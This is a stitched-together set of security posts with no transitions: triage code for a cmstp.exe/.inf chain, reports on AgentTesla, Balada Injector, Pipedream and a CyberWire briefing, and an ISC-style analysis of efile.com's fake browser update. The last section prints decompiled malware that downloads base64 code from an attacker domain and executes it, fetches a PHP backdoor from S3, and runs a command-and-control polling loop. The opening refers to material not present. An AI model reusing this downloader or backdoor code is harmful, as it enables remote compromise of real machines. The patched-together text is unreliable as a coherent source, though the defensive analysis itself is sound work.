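Two triage checks a defender can run over artifacts from this chain, written as an added Python example rather than code from the diary: a minimal .inf reader that resolves the section a RunPreSetupCommands= key points to and reports the commands it would run plus the ServiceName string, and a pattern scan for the scheduled-task argument that decodes and reflectively loads an assembly stored under HKCU. The .inf sample is constructed to resemble cmstp.inf as described above (the diary does not show the command line inside the real file, so the powershell line is an assumption); the task argument is the one quoted above.

```python
"""Triage checks for the cmstp.exe / .inf / scheduled-task chain above.

Added example, not the diary's code. SAMPLE_INF is constructed to resemble
cmstp.inf as the diary describes it; the exact command line inside the real
file is not shown, so a plausible one is assumed here.
"""
import re

# Interpreters and LOLbins whose appearance in a setup command is worth flagging.
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript",
                "mshta", "rundll32", "regsvr32", "certutil", "bitsadmin")

# Pieces of the scheduled-task argument seen in the diary.
TASK_PATTERNS = {
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "registry_read": re.compile(r"\b(gp|Get-ItemProperty)\b\s+['\"]?HKCU:", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}


def parse_inf(text):
    """Minimal .inf reader: {section name (lowercased): [lines]}.

    Section names are case-insensitive in .inf files. Lines beginning with
    ';' are comments; a comment following a section header on the same line
    is dropped. Other lines are kept whole, since commands may contain ';'.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            end = line.find("]")
            if end == -1:
                continue
            current = line[1:end].strip().lower()
            sections.setdefault(current, [])
            continue
        if current is not None:
            sections[current].append(line)
    return sections


def pre_setup_section_names(sections):
    """Names of the sections that RunPreSetupCommands= keys point to.

    The literal name used in the diary's file is included as a fallback.
    """
    names = {"runpresetupcommandssection"}
    for lines in sections.values():
        for line in lines:
            key, _, value = line.partition("=")
            if key.strip().lower() == "runpresetupcommands" and value.strip():
                names.add(value.strip().lower())
    return names


def inf_findings(text):
    """Report pre-setup commands, interpreter hits and ServiceName of an .inf."""
    sections = parse_inf(text)
    commands = []
    for name in sorted(pre_setup_section_names(sections)):
        commands.extend(sections.get(name, []))
    hits = []
    for cmd in commands:
        lowered = cmd.lower()
        hits.extend((tool, cmd) for tool in INTERPRETERS if tool in lowered)
    service_name = None
    for line in sections.get("strings", []):
        key, _, value = line.partition("=")
        if key.strip().lower() == "servicename":
            service_name = value.strip().strip('"')
    return {"commands": commands, "interpreter_hits": hits,
            "service_name": service_name}


def scan_task_arguments(argument):
    """Sorted names of the TASK_PATTERNS a scheduled-task argument matches."""
    return sorted(name for name, rx in TASK_PATTERNS.items() if rx.search(argument))


# Constructed .inf resembling cmstp.inf; the powershell line is an assumption.
SAMPLE_INF = r"""
[version]
Signature=$chicago$

[DefaultInstall]
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install
powershell.exe -File C:\Users\Public\task.ps1

[Strings]
ServiceName="CorpVPN"
"""

# The scheduled-task argument quoted in the diary.
SAMPLE_TASK_ARGUMENT = (
    r'-w hiDden $you=[Convert]::FromBase64String((gp "HKCU:\Software\lath3")'
    r'.lath2);[Reflection.Assembly]::Load($you);[QJAMsrpfhk.HH]::Main()'
)

if __name__ == "__main__":
    print(inf_findings(SAMPLE_INF))
    print(scan_task_arguments(SAMPLE_TASK_ARGUMENT))
```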
[1] https://learn.microsoft.com/en-us/windows-hardware/drivers/install/overview-of-inf-files
Xavier Mertens (@xme)
ESET has discovered a malware campaign targeting Latin American countries that distributes a remote access trojan through phishing. The goal of this campaign, named "Operación Guinea Pig", is to infect victims with the AgentTesla malware, which lets attackers carry out nefarious actions on the infected host.
A malware distribution campaign using phishing techniques has recently been discovered. It was detected by ESET, and the most affected countries include Mexico, Peru, Colombia, Ecuador and Chile.
The ultimate goal is to infect victims with malware that lets attackers perform various actions on the infected machine. These range from stealing passwords to taking screenshots, and then sending this information to the cybercriminals' servers.
About the AgentTesla malware
Agent Tesla is remote access trojan (RAT) malware that has been active since 2014 and is distributed as Malware-as-a-Service (MaaS) in global campaigns.
This malware is built on the .NET framework and is used to spy on and steal information from compromised machines: it can extract credentials from various software, obtain web browser cookies, record the machine's keystrokes (keylogging), and take screenshots and capture the clipboard. The malicious code uses several methods to send the collected information to the attacker.
It has also been observed that this threat can come wrapped in a packer with several layers of obfuscation. This is used to try to evade security solutions and to hamper the investigation and analysis of the malware. These packers can implement various techniques to gather information about the machine they are running on, for example to find out whether it is a virtual machine or a sandbox, and, if so, avoid executing.
Propagation and infection methods
This threat usually spreads through phishing emails that include a malicious attachment with which the attackers try to trick the recipient into downloading and running the content. For example, emails impersonating the delivery company DHL were used, as shown below:
Fig. 1. Phishing email in Operación Guinea Pig. (Source: welivesecurity.com)
The informal wording of the email should raise strong suspicion. It is also worth noting that the attachment has a double extension, .jpg.xxe, which reveals that the file is compressed.
The malicious attachments may vary, both to deceive the user and to evade security solutions. For example, they may be compressed files, Office documents, an executable file, etc.
The diagram in Fig. 2 shows an example of a typical Agent Tesla infection process. In this case it starts from an email with malicious content, passes through several stages in which malicious code is downloaded from a URL and then executed, and ends with the execution of the final payload: Agent Tesla.
Fig. 2. Diagram of the AgentTesla infection process. (Source: welivesecurity.com)
Technical analysis of a file infected with AgentTesla
On the one hand, AgentTesla has two classes containing variables and methods related to its configuration. Depending on these configuration classes the malware's behaviour can vary somewhat, but it is mainly capable of the following actions:
Persistence on the victim's machine
Obtaining the public IP of the victim's machine
Obtaining information about the victim's machine (operating system, CPU, RAM, username, etc.)
Taking screenshots of the victim's machine
Running a keylogger
Fig. 3. AgentTesla variables used to gain persistence. (Source: welivesecurity.com)
On the other hand, Agent Tesla searches the victim's machine for the presence of various software and tries to obtain sensitive information from it, for example stored credentials. The information collected from each of these programs is stored to be sent to the attacker later. It also performs a similar procedure to extract the cookies stored in the browsers installed on the victim's machine.
Once the malware has collected all the information from the machine, the attacker will manipulate the computer to exfiltrate it. Agent Tesla has several methods for exfiltrating information, for example:
HTTP: sends the information to a server controlled by the attacker. For this option the malware downloads, installs and uses the TOR browser as a proxy.
SMTP: sends the information to an email account controlled by the attacker.
FTP: sends the information to an FTP server controlled by the attacker.
Telegram: sends the information to a private Telegram chat.
Fig. 4. Exfiltration of information via SMTP. (Source: welivesecurity.com)
The file analysed next is the one that arrives as an attachment in the emails. It is an executable built with the Microsoft .NET framework that contains obfuscated malicious Visual Basic code, illustrated below:
Fig. 4. Obfuscated code inside the malicious file. (Source: welivesecurity.com)
The main purpose of the malicious code is to invoke the PowerShell interpreter to run further malicious code that downloads a malicious DLL hosted at the following URL: https[:]//firebase.ngrok.io/testing/EXE_DLL.txt.
Once the DLL is downloaded, the malicious PowerShell code runs it, passing an obfuscated string as an argument. This DLL, also built with the Microsoft .NET framework, manipulates the received string to obtain a new URL, which in this case was: http[:]//195.178.120.24/xjkhcjxzvjvxkzvzxkvkzxbcvkzxcbz.txt.
The DLL then downloads AgentTesla from this new URL and injects the malware into the legitimate RegSvcs.exe process using the Process Hollowing technique.
Mechanisms to mitigate the associated vulnerabilities
If there is no indication that the email is malicious, check that the recipient is valid.
Do not open any email if there is reason for suspicion, whether about its content or about the person who sent it.
Do not download email attachments if you have doubts about why you received them or about anything else.
Check file extensions. For example, if a file ends in ".pdf.exe", the last extension determines the file type; in this case it would be ".exe", that is, an executable.
If an email includes a link that takes you to a page asking for your credentials, do not enter them; open the official site in another browser or tab and log in from there.
Have a periodic password-change policy.
Keep the security solutions installed on the device up to date.
IoC
Reference:
https://www.welivesecurity.com/la-es/2023/04/20/operacion-guinea-pig-correos-phishing-malware-agenttesla-mexico-america-latina/
CosmicEnergy is OT and ICS malware from Russia, maybe for red teaming, maybe for attack. Updates on Volt Typhoon, China’s battlespace preparation in Guam and elsewhere. In the criminal underworld, Legion malware has been upgraded for the cloud. Johannes Ullrich from SANS examines time gaps in logging. Our guest is Kevin Kirkwood from LogRhythm with a look at extortion attempts and ransomware. And Atlantic hurricane season officially opens next week: time to batten down those digital hatches.
For links to all of today’s stories check out our CyberWire daily news briefing:
https://thecyberwire.com/newsletters/daily-briefing/12/102
Selected reading.
COSMICENERGY: New OT Malware Possibly Related To Russian Emergency Response Exercises (Mandiant)
People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection (Joint Advisory)
Volt Typhoon targets US critical infrastructure with living-off-the-land techniques (Microsoft)
China hits back at ‘the empire of hacking’ over Five Eyes US cyber attack claims (ABC)
Updates to Legion: A Cloud Credential Harvester and SMTP Hijacker (Cado)
Legion Malware Upgraded to Target SSH Servers and AWS Credentials (Hacker News)
CISA Warns of Hurricane/Typhoon-Related Scams (Cybersecurity and Infrastructure Security Agency CISA)
Internet-facing RDP servers are an increasingly common vector of compromise. This blog explains how one RDP infection nearly led to the creation of a botnet, had Darktrace AI not alerted the security team as soon as the attack began.
Key Takeaways The Russian Federal Security Services’ (FSB) Snake malware, also known as “Uroburos,” is a highly sophisticated, modular cyber espionage tool used for long-term intelligence collection. Snake malware has been used to steal sensitive documents from NATO member governments, journalists, and other targets of interest to the Russian Federation. Operation MEDUSA, a court-authorised disruption … Arctic Wolf Labs Review of Joint Cybersecurity Advisory on Russian-Backed Snake Malware
As threat actors are continually employing novel methods to compromise a network, a growing number of healthcare companies are now having to play catch-up in a fast-evolving threat landscape.
A campaign active since 2017 is exploiting vulnerabilities in WordPress themes and plugins to inject Linux backdoors into a million compromised websites. Research by Sucuri shares indicators of compromise (IoCs) and guidance for identifying and removing the Balada Injector malware.
Sucuri has recently been tracking a massive WordPress infection campaign that has been active since 2017 but, until recently, had never been given a proper name. Its research estimates that more than a million WordPress sites have been infected by this ongoing campaign, which deploys malware named Balada Injector.
According to GoDaddy-owned Sucuri, the campaign "leverages all known and recently discovered theme and plugin vulnerabilities" to breach WordPress sites. Sucuri reports that Balada Injector attacks in waves roughly once a month, each wave using a freshly registered domain name to evade blocklists. The malware typically exploits newly disclosed vulnerabilities and builds custom attack routines around the flaw it targets.
The report builds on recent findings from Doctor Web, which detailed a Linux malware family that exploits flaws in more than two dozen plugins and themes to compromise vulnerable WordPress sites.
Over the years, Balada Injector has used more than 100 domains and a range of methods to exploit known security flaws (for example, HTML injection and site URL injection), with the attackers primarily trying to obtain the database credentials stored in wp-config.php.
This large number of attack vectors has also produced duplicate infections, with later waves hitting sites that were already compromised. Sucuri highlights one site that was attacked 311 times with 11 different versions of Balada.
Attack method
Typical injection and redirect destination for Balada Injector. (Source: blog.sucuri.net)
"This campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of freshly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites," says security researcher Denis Sinegubko.
The redirect sites include fake tech support, fraudulent lottery wins and bogus CAPTCHA pages that urge users to enable notifications ("Allow to verify that you are not a robot"), which lets the operators push spam ads.
The attacks are also designed to read or download arbitrary files from the site, including backups, database dumps, log and error files, and to look for tools such as adminer and phpmyadmin that site administrators may have left behind after maintenance tasks.
Balada Injector also performs broad searches of the top-level directories of the compromised site's filesystem to locate writable directories belonging to other sites. "Most commonly these sites belong to the webmaster of the compromised site and they all share the same server account and the same file permissions," Sinegubko explains. "This way, compromising a single site can potentially grant access to several other sites 'for free'."
If these attack paths are not available, the admin password is brute-forced using a set of 74 predefined credentials.
Post-infection activity
Balada's scripts focus on exfiltrating sensitive information, such as the database credentials in wp-config.php files, so even if the site owner removes an infection and patches their plugins, the threat actor retains a way back in.
The campaign also looks for backup and database files, access logs, debugging information and any files that may contain sensitive data. Sucuri says the threat actor frequently updates the list of targeted files.
As mentioned above, the malware also checks for database administration tools such as Adminer and phpMyAdmin. If these tools are vulnerable or misconfigured, they can be used to create new admin users, extract site information or inject persistent malware into the database.
Balada backdoors
Once it has infected a victim, Balada Injector plants multiple backdoors on the compromised WordPress site for redundancy; they act as hidden access points for the attackers.
Sucuri reports that in 2022 Balada was dropping backdoors at 176 predefined paths, making complete backdoor removal a very difficult task.
List of backdoor paths generated by Balada. (Source: blog.sucuri.net)
The researchers note that the Balada injectors are not present on every compromised site, since such a large number of clients would be hard to manage. They estimate that the attackers uploaded the malware to websites hosted on private or virtual private servers showing signs of being poorly managed or neglected. From there, the injectors look for websites sharing the same server account and file permissions and search them for writable directories, starting with the most privileged directories, to carry out cross-site infections.
This approach lets the threat actors compromise several sites at once and spread their backdoors quickly while managing a minimal number of injectors. Cross-site infections also let the attackers reinfect cleaned sites again and again, for as long as they keep access to the VPS.
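The two identification points above (String.fromCharCode-obfuscated script injections, and writable directories shared across sites on the same server account) as an added example that is not part of the Sucuri research or the CSIRT CEDIA post: a small scanner that walks a web root, decodes every String.fromCharCode(...) literal it finds in PHP/JS/HTML files, reports the ones that resolve to a URL or a script tag, and lists group- or world-writable directories. The WordPress-like tree it scans is constructed inline; the injected URL abc123.example.invalid is a made-up stand-in for a Balada subdomain, not an indicator from the report.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List

# String.fromCharCode(104, 116, 116, ...) with optional whitespace around the codes
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*((?:\d+\s*,\s*)*\d+)\s*\)")


def decode_charcodes(js: str) -> List[str]:
    """Decode every String.fromCharCode(...) literal found in a blob of JavaScript."""
    out = []
    for m in CHARCODE_RE.finditer(js):
        codes = [int(c) for c in re.split(r"\s*,\s*", m.group(1).strip())]
        out.append("".join(chr(c) for c in codes))
    return out


def suspicious_strings(path: str) -> List[str]:
    """Decoded literals that look like injected script sources or markup."""
    try:
        with open(path, "r", encoding="utf-8", errors="ignore") as f:
            text = f.read()
    except OSError:
        return []
    # Legitimate code also uses fromCharCode for single characters; only keep URLs and tags.
    return [s for s in decode_charcodes(text) if "http" in s or "<script" in s]


def scan_webroot(root: str) -> Dict[str, List[str]]:
    """Walk root and return {relative path: decoded strings} for files with hits."""
    hits: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith((".php", ".js", ".html", ".htm")):
                full = os.path.join(dirpath, name)
                found = suspicious_strings(full)
                if found:
                    hits[os.path.relpath(full, root).replace(os.sep, "/")] = found
    return hits


def writable_dirs(root: str) -> List[str]:
    """Directories under root that another account on the same server could write into."""
    bad = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            if os.stat(full).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                bad.append(os.path.relpath(full, root).replace(os.sep, "/"))
    return sorted(bad)


INJECT_URL = "https://abc123.example.invalid/main.js"  # made-up stand-in for a Balada subdomain


def build_sample_site(root: str) -> None:
    """Constructed tree: one clean JS file, one injected theme file, one world-writable dir."""
    clean = os.path.join(root, "wp-includes", "js")
    theme = os.path.join(root, "wp-content", "themes", "example")
    uploads = os.path.join(root, "wp-content", "uploads")
    for d in (clean, theme, uploads):
        os.makedirs(d, exist_ok=True)
    # Pin modes explicitly so the result does not depend on the caller's umask.
    for d in (os.path.join(root, "wp-includes"), clean, os.path.join(root, "wp-content"),
              os.path.join(root, "wp-content", "themes"), theme):
        os.chmod(d, 0o755)
    os.chmod(uploads, 0o777)
    with open(os.path.join(clean, "jquery.min.js"), "w") as f:
        f.write("/* clean */ var q = String.fromCharCode(65);\n")  # decodes to "A": not flagged
    codes = ",".join(str(ord(c)) for c in INJECT_URL)
    with open(os.path.join(theme, "footer.php"), "w") as f:
        f.write("<?php wp_footer(); ?>\n<script>var s=document.createElement('script');"
                f"s.src=String.fromCharCode({codes});document.head.appendChild(s);</script>\n")


def run_demo() -> Dict[str, object]:
    """Build the constructed site in a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix="balada_demo_")
    build_sample_site(root)
    return {"hits": scan_webroot(root), "writable": writable_dirs(root)}


if __name__ == "__main__":
    result = run_demo()
    for path, strings in result["hits"].items():
        print(f"{path}: {strings}")
    print("writable by other accounts:", result["writable"])
```

On a real host, run scan_webroot against each site's document root and writable_dirs against the account's home; a hit in a theme or plugin file is a starting point for cleanup, and a writable directory owned by another site is exactly the path the cross-site infections above travel along.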
What should an organization do about this threat?
The newly described campaign underscores the need to strengthen security and adopt habits that support it, such as regular updates, user education and threat awareness, to minimize the risk of future attacks.
The researchers shared indicators of compromise (IoCs) and guidance for identifying and removing the Balada Injector backdoor. Users who believe their websites may have fallen prey to the campaign should nonetheless contact security professionals for help.
Sucuri further notes that defending against Balada Injector can vary from case to case and that, given the wide variety of infection vectors, there is no single set of instructions administrators can follow to keep the threat at bay. Sucuri's general WordPress malware cleanup guides should, however, be enough to block most attempts.
Since Balada Injector keeps exploiting vulnerabilities in WordPress themes and plugins, site owners and administrators are advised to stay alert and take precautions to protect their assets. WordPress users should keep their site software up to date, remove unused plugins and themes, and use strong WordPress admin passwords. Enabling two-factor authentication and adding file integrity monitoring should also be considered; together these measures go a long way toward keeping the campaign out.
Reference:
https://blog.sucuri.net/2023/04/balada-injector-synopsis-of-a-massive-ongoing-wordpress-malware-campaign.html?web_view=true
The post Malware Balada Inyector: Campaña masiva afecta sitios WordPress (Balada Injector malware: massive campaign hits WordPress sites) appeared first on CSIRT CEDIA.
In the lead-up to the 2021 Super Bowl, a water treatment plant 15 miles away from Raymond James Stadium in Tampa was targeted in a cyberattack. The perpetrator manipulated the water’s sodium hydroxide levels from 100 parts per million to 11,100 parts per million. This change would have poisoned the water supply. Thanks to the quick action of an observant staff member, the attack was thwarted before any harm could be done. While ransomware and data leaks are concerning, a successful cyberattack on a physical industrial facility could be catastrophic.
Recently, the industrial cybersecurity firm Dragos reported on a development that puts industrial installations at even higher risk. According to the report, in 2022, the Chernovite threat group created Pipedream, a new modular malware designed to attack industrial control systems (ICS). This powerful toolkit has the potential for disruptive and destructive attacks on tens of thousands of crucial industrial devices. The risk impacts entities that are responsible for managing the electrical grid, oil and gas pipelines, water systems and manufacturing plants.
Growing Industrial Control System Threat
Chernovite developers created Pipedream, a modular ICS attack framework that is now the seventh known ICS-specific malware, according to the Dragos report. Pipedream is the first ever cross-industry disruptive and destructive ICS / operational technology (OT) malware. Its existence proves that industrial adversarial capabilities have ramped up considerably.
Dragos states that the Chernovite group possesses a breadth of ICS-specific knowledge beyond what’s observed in other threat actors. The ICS expertise demonstrated in Pipedream includes capabilities to disrupt, degrade and potentially destroy physical processes in industrial environments.
While Pipedream itself is a new ICS capability, its appearance reveals a trend toward more technically capable and adaptable adversaries targeting ICS/OT, as per Dragos. In addition to implementing common ICS/OT-specific protocols, Pipedream improves upon techniques from earlier ICS malware. CRASHOVERRIDE, the malware Dragos attributes to the ELECTRUM group, exploited the OPC Data Access (OPC DA) protocol to manipulate breakers and electrical switchgear. Chernovite, by contrast, uses the newer but comparable OPC UA protocol.
Dragos has high confidence that a state actor developed Pipedream intending to leverage it for future disruptive or destructive operations. Pipedream’s capabilities provide an adversary with a range of options for learning about a target’s OT network architecture and identifying its assets and processes. This information lays the groundwork for further disruptive and destructive attacks. It also increases an adversary’s knowledge to develop more capabilities to wreak havoc on a much broader scale.
Ransomware Attacks Against Industrial Organizations
While ICS/OT attacks are cause for worry, the industrial sector isn’t immune to ransomware attacks either. Along these lines, the Dragos report also included tidbits of information about ransomware, such as:
Ransomware attacks against industrial organizations increased by 87% over last year
35% more ransomware groups impacted ICS/OT in 2022
Ransomware attacks targeted 437 manufacturing entities in 104 unique manufacturing subsectors.
The Dragos report says, “As ransomware activity increases, it results in more risk for OT networks, particularly networks with poor segmentation.”
5 Critical Controls for Strong ICS/OT Cyber Defense
Dragos recommends following the SANS Five ICS Cybersecurity Critical Controls as a guide for ICS/OT cybersecurity strategy. According to the Dragos report, a review of these controls revealed the following findings along with recommendations on how to improve:
ICS-Specific Incident Response: The evaluation of this critical control showed mixed results. Detection, elevation and plan activation all improved. But scores declined in the ability to communicate, document and recover. Electric utilities showed the best preparedness, followed by oil and gas, while manufacturing performed the worst. Mitigating the potential impact of an incident is different for pipelines, electrical grids and manufacturing plants. A dedicated ICS-specific plan must include the right contact points. This means identifying which employees have the right skills within the plant, plus a well-developed plan of action for specific scenarios at specific locations.
Defensible Architecture: This second critical control includes elements such as segmentation, least privilege, visibility, resilience and automation. Dragos found marked improvements in network segmentation, but 50% of environments still have room to improve. Uncontrolled external connections into OT were found in 53% of Dragos engagements in 2022. OT security strategies start with hardening the environment. This includes removing extraneous OT network access points, maintaining strong policy control at IT/OT interface points and mitigating high-risk vulnerabilities.
ICS Network Visibility: The third critical control evaluation revealed 80% of environments had little or no visibility into traffic and devices in ICS/OT environments. Far too many environments find it difficult to detect and investigate important issues. Maintaining accurate asset inventory is even more challenging. An effective OT security posture maintains an inventory of assets, maps vulnerabilities against those assets (and mitigation plans) and actively monitors traffic for potential threats.
Secure Remote Access: Evaluation of the fourth critical control showed users in 54% of environments using the same credentials for IT systems and OT systems. Remote access is the most common way for threat groups to penetrate OT systems. Credential sharing makes it much easier for threats to cross from IT to OT. Multi-factor authentication (MFA) can and should be applied to OT. Implementing MFA across systems adds an extra layer of security for a relatively small investment.
Risk-Based Vulnerability Management: The final critical control showed that only 15% of CVEs included errors in 2022, down 4% from 2021. But 77% of vulnerabilities still lack mitigation steps. This demonstrates the challenge of employing a risk management approach that can both mitigate the risk of exploitation and reduce production downtime from patches. A successful OT vulnerability management program requires timely awareness of key vulnerabilities with the right information and risk ratings. Also, alternative mitigation strategies will minimize exposure while continuing to operate.
Securing Industrial Processes
The emergence of the Pipedream malware should serve as a wake-up call. Industrial cyberattack capabilities and incidents are increasing, and the results could be disastrous. Meanwhile, the security response contains gaps that require immediate attention.
The post Pipedream Malware Can Disrupt or Destroy Industrial Systems appeared first on Security Intelligence.
Yesterday, I wrote about efile.com serving malicious fake "Browser Updates" to some of its users. This morning, efile.com finally removed the malicious code from its site. The attacker reacted a bit faster and removed some of the additional malware. But luckily, I was able to retrieve some of the malware last evening before it was removed.
Depending on the browser, you may have received one of two binaries, "update.exe" or "installer.exe." These binaries are quite different. I will focus on "update.exe" for two reasons: it was used for Chrome users, who are the vast majority compared to the other option, Firefox. Secondly, "update.exe" is written in Python, making it much easier to analyze.
BLUF (Bottom Line Up Front)
The attack uses two main executables. The first one, “update.exe,” is a simple downloader downloading and executing the second part. The second part is a PHP script communicating with the command and control server. Its main function is to download and execute additional code as instructed to do so. During the installation, basic system information is sent to the attacker, and the backdoor is made persistent via scheduled/on-boot registry entries.
Decompiling update.exe
To turn Python scripts into stand-alone executables, PyInstaller is usually used. PyInstaller isn't a traditional compiler. Instead, it takes the Python bytecode files (.pyc files) and packs them, together with all the needed libraries and the Python runtime itself, into an archive appended to a small bootloader stub that unpacks and runs it all.
Reversing such a binary includes two steps:
1. Extract the files PyInstaller used to create the binary. I used pyinstxtractor to do this:
python3 pyinstxtractor.py ../update.exe
2. Decompile the .pyc files. There are about 70 in this case. Most of them are various standard Python libraries. In this case, p.pyc was the “interesting” one.
uncompyle6 p.pyc > p.py
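The extraction step above, as an added example that is not from the ISC diary and not pyinstxtractor's code: a minimal walker over the PyInstaller CArchive layout that pyinstxtractor relies on. It finds the trailing cookie, computes where the overlay starts inside the executable, walks the table of contents and inflates each entry. The archive it parses is constructed inline behind a dummy MZ stub so it runs without update.exe; the entry names, their contents and the python311.dll library name are assumptions, and the cookie layout is the PyInstaller 2.1+ one (8-byte magic, package length, TOC offset, TOC length, Python version, 64-byte pylib name).

```python
import struct
import zlib
from typing import Dict

# Trailing cookie that PyInstaller (2.1 and later) appends to the packed executable.
MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FMT = "!8sIIii64s"    # magic, package length, TOC offset, TOC length, Python version, pylib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)       # 88 bytes
ENTRY_FMT = "!iIIIBc"        # entry length, data offset, compressed size, uncompressed size, zlib flag, type code
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)         # 18 bytes; the NUL-padded entry name follows


def build_archive(files: Dict[str, bytes], pyver: int = 311) -> bytes:
    """Constructed stand-in for a PyInstaller overlay: data blobs, then TOC, then cookie."""
    data, toc = b"", b""
    for name, raw in files.items():
        blob = zlib.compress(raw)
        nm = name.encode() + b"\0"
        entry_len = ENTRY_SIZE + len(nm)
        if entry_len % 16:                       # PyInstaller pads each entry to 16 bytes
            nm += b"\0" * (16 - entry_len % 16)
            entry_len = ENTRY_SIZE + len(nm)
        # type code b"s" = PYSOURCE (a script entry); compression flag 1 = zlib
        toc += struct.pack(ENTRY_FMT, entry_len, len(data), len(blob), len(raw), 1, b"s") + nm
        data += blob
    pkg_len = len(data) + len(toc) + COOKIE_SIZE  # the package length counts the cookie itself
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(data), len(toc), pyver, b"python311.dll")
    return data + toc + cookie


def cookie_fields(exe: bytes) -> Dict[str, object]:
    """Parse the last cookie in the file and return the fields an extractor needs."""
    pos = exe.rfind(MAGIC)
    if pos < 0:
        raise ValueError("no PyInstaller cookie found")
    _magic, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(COOKIE_FMT, exe[pos:pos + COOKIE_SIZE])
    return {
        "cookie_pos": pos,
        "overlay_pos": pos + COOKIE_SIZE - pkg_len,   # where the archive starts inside the PE
        "toc_off": toc_off,
        "toc_len": toc_len,
        "python_version": pyver,                       # e.g. 311 for Python 3.11
        "pylib": pylib.rstrip(b"\0").decode(),
    }


def extract_entries(exe: bytes) -> Dict[str, bytes]:
    """Walk the TOC and return {entry name: inflated bytes}, like pyinstxtractor's output directory."""
    c = cookie_fields(exe)
    base = c["overlay_pos"]
    toc = exe[base + c["toc_off"]: base + c["toc_off"] + c["toc_len"]]
    entries: Dict[str, bytes] = {}
    pos = 0
    while pos < len(toc):
        entry_len, off, csize, usize, cflag, _typ = struct.unpack(ENTRY_FMT, toc[pos:pos + ENTRY_SIZE])
        name = toc[pos + ENTRY_SIZE: pos + entry_len].rstrip(b"\0").decode()
        payload = exe[base + off: base + off + csize]
        if cflag:
            payload = zlib.decompress(payload)
        if len(payload) != usize:
            raise ValueError(f"size mismatch for entry {name!r}")
        entries[name] = payload
        pos += entry_len
    return entries


# Constructed sample: a fake MZ stub followed by an archive with two entries.
DUMMY_STUB = b"MZ" + b"\0" * 62 + b"stand-in for the PyInstaller bootloader\n"
SAMPLE_EXE = DUMMY_STUB + build_archive({
    "p": b"import os\n# stand-in for the decompiled p.pyc\n",
    "struct": b"# stand-in for a bundled stdlib module\n",
})

if __name__ == "__main__":
    info = cookie_fields(SAMPLE_EXE)
    print(f"Python {info['python_version']}, overlay at offset {info['overlay_pos']}")
    for name, content in extract_entries(SAMPLE_EXE).items():
        print(f"{name}: {len(content)} bytes")
```

The Python version in the cookie is the first thing to read off a real sample: the .pyc entries can only be decompiled with a matching interpreter, which is why uncompyle6 works on some builds and not others.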
Let's start by looking at the "main" part of p.py:
1 if __name__ == '__main__':
2     try:
3         HWND = win32gui.GetForegroundWindow()
4         win32gui.SetWindowPos(HWND, None, 9999, 9999, 100, 100, win32con.SWP_NOSENDCHANGING | win32con.SWP_SHOWWINDOW)
5         base_path = 'C:\ProgramData\Browsers'
6         if not os.path.exists(base_path):
7             os.mkdir(base_path)
8         else:
9             if not os.path.exists(base_path + '\downloads'):
10                 os.mkdir(base_path + '\downloads')
11         init()
12         if is_admin():
13             priv = 'system'
14             runcode = urllib.request.urlopen('https://www.infoamanewonliag.online/update/code.php?priv=' + priv)
15             runcode = base64.b64decode(runcode.read().decode('utf-8'))
16             exec(runcode)
17             urllib.request.urlopen('https://www.infoamanewonliag.online/update/installed.php')
18         else:
19             priv = 'user'
20             runcode = urllib.request.urlopen('https://www.infoamanewonliag.online/update/code.php?priv=' + priv)
21             runcode = base64.b64decode(runcode.read().decode('utf-8'))
22             exec(runcode)
23             urllib.request.urlopen('https://www.infoamanewonliag.online/update/installed.php')
24     except Exception as e:
25         try:
26             print('got exception: ' + str(e))
27             urllib.request.urlopen('https://www.infoamanewonliag.online/update/error.php?detail=' + base64.urlsafe_b64encode(str(e).encode('utf-8')).decode('utf-8'))
28         finally:
29             e = None
30             del e
Lines 3-5: Move the update.exe window off screen to hide it, and set the base path C:\ProgramData\Browsers.
Lines 6-10: Create the base directory or, if it already exists, a "downloads" subdirectory under it (as written, the subdirectory is only created on a run where the base directory already exists). "downloads" is used later to hold additional code.
Line 11: "init" downloads additional code (see below).
Line 12: Check whether the user is an administrator.
Lines 13-17: Download the code that will make the backdoor persistent, execute it, and notify the attacker of the success.
Lines 18-23: If the user isn't an administrator, the same download-and-execute sequence runs with priv=user, so the server can hand back a payload suited to an unprivileged context.
Lines 24-30: Report any errors back to the attacker.
Init
The "init" function is one of the more complex ways I have seen to run a backdoor. The backdoor is implemented in PHP. It is not a "webshell". Instead, it polls a URL on the attacker's system and executes any commands that may be sent. It starts out by loading 4 files:
file1 = down_file('https://channel-platform.s3.ap-east-1.amazonaws.com/package/7z.exe')
file2 = down_file('https://channel-platform.s3.ap-east-1.amazonaws.com/package/php.7z')
file3 = down_file('https://channel-platform.s3.ap-east-1.amazonaws.com/package/1.php')
file4 = down_file('https://channel-platform.s3.ap-east-1.amazonaws.com/package/php.vbs')
extract = file1 + ' x -y -pphpshell -o' + base_path + ' ' + file2
print(extract)
os.system(extract)
"file1" appears to be a genuine copy of the compression utility 7zip.
"file2" is a password-protected archive (password "phpshell") containing essentially a complete copy of PHP 7.
"file3" is a PHP script implementing a command and control channel.
"file4" is a simple VBS script to run 1.php using the PHP interpreter.
The main loop of the PHP script:
while(1){
    try {
        $res = curl_https($api_url.'query',$data);
        logs($res);
        $res = json_decode($res,true);
        if($res['istask'] > 0)
        {
            handletask($res);
        }
        sleep(isset($res['sleep'])?$res['sleep']:10);
    }catch(Exception $e){
        logs('error ......');
    }
}
